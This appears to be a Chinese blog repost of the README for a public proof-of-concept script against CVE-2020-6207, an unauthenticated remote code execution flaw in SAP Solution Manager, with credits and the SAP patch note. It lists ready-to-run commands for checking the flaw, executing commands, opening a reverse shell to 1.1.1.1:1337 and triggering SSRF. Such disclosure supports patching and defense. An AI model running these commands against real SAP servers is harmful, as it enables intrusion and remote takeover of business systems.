【高危漏洞】SAP Solution Manager EemAdmin 远程代码执行漏洞(CVE-2020-6207)

该漏洞影响组件:SAP Solution Manager SAP解决方案管理缺少验证检查 目前无临时修补方案

漏洞详情

为的PoC CVE-2020-6207 (SAP解决方案管理缺少验证检查)
该脚本允许检查和漏洞缺少SAP EEM servlet身份验证检查(tc~smd~agent~application~eem铅在连接到SAP解决方案管理器SAP SMDAgents RCE)
原件的发现:

论文:一次未经身份验证的扎根之旅为公司的企业软件服务器提供服务
解决方案:SAP笔记2890213

细节

您将在流程文章中找到漏洞详细信息

如何使用

只需指向SAP Solution Manager hostnmae / ip。

检查一下

➜ python sol-rce.py -H 172.16.30.43 -P 50000 -c
Vulnerable! [CVE-2020-6207] - http://172.16.30.43:50000

触发RCE

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe

取得BackConnect

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337

SSRF

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk

其他

还有其他选项:

➜ python sol-rce.py -h

usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM]
                  [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP]
                  [--list] [--clear] [-t TIMEOUT] [-v]

PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
Solution: https://launchpad.support.sap.com/#/notes/2890213

twitter: https://twitter.com/_chipik

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  SAP Solution Manager host(default: 127.0.0.1)
  -P PORT, --port PORT  SAP Solution Manager web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex: 127.0.0.1:8080)
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -d VICTIM, --victim VICTIM
                        DA serverName
  --ssrf SSRF           exploit SSRF. Point http address here. (example:http://1.1.1.1/chpk)
  --rce RCE             exploit RCE
  --back BACK           get backConnect from DA. (ex: 1.1.1.1:1337)
  --setup SETUP         setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97)
  --list                Get a list of existing DA servers
  --clear               stop and delete all PoCScript<rnd> scripts from DA servers
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode
© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
大佬不来一句? 抢沙发

请登录后发表评论